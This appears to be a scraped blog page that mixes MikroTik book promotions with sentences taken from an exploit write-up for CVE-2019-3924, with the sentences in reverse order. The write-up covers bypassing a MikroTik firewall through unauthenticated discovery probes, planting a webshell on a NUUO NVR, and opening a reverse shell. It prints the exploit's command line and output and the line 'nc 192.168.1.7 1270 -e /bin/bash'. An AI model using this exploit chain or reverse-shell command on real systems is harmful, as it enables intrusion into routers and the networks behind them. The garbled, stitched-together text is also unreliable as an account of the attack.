11/8/2023 0 Comments Default firewall mikrotik![]() ![]() MikroTik Security Guide and Networking with MikroTik: MTCNA Study Guide by Tyler Hart are both available in paperback and Kindle! Preface The exploit connects to the router, sends a discovery probe to a LAN target, uploads a webshell, and executes a reverse shell back to a WAN host./nvr_rev_shell -proxy_ip 192.168.1.70 -proxy_port 8291 -target_ip 10.0.0.252 -target_port 80 -listening_ip 192.168.1.7 -listening_port 1270 Running in exploitation mode Attempting to connect to a MikroTik router at 192.168.1.70:8291 Connected! Looking for a NUUO NVR at 10.0.0.252:80 Found a NUUO NVR! Uploading a webshell Executing a reverse shell to 192.168.1.7:1270 Done! listener gets the root shell as expected.You can now get MikroTik training direct from Manito Networks. I’ve combined the three sections above into a single exploit. The nc command will connect back to the attacker’s box with a root shell. The probe above executes the command “ nc 192.168.1.7 1270 -e /bin/bash” via the webshell at a.php. bool find_nvrmini2(Winbox_Session& session, std::string& p_address, boost::uint32_t p_converted_address, boost::uint32_t p_converted_port) I’ve again used my WinboxMessage implementation. The following is taken from my proof on concept on GitHub. ![]() Using the title tag, you can construct a probe that detects an NVRMini2. Responses are matched against a provided regular expression. The probe supports up to three requests and responses. ![]() A probe is a set of variables that tells the router how to talk to a host on a given port. However, one of the binaries that handles the probes (agent) fails to verify whether the remote user is authenticated. Under normal circumstances, The Dude authenticates with the router and uploads the probes over the Winbox port. Probing to Bypass the FirewallĬVE-2019–3924 is the result of the router not enforcing authentication on network discovery probes. Let’s see how the attacker can get at 10.0.0.252 anyways. The attacker, 192.168.1.7, shouldn’t be able to initiate communication with the victim at 10.0.0.252. Don’t worry, I’m just simulating real world configurations. By default, Winbox is only available on the MikroTik hAP via the LAN. One important thing about this setup is that I opened port 8291 in the router’s firewall to allow Winbox access from the WAN. NVRMini2 should be safe from the attacker at 192.168.1.7 ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |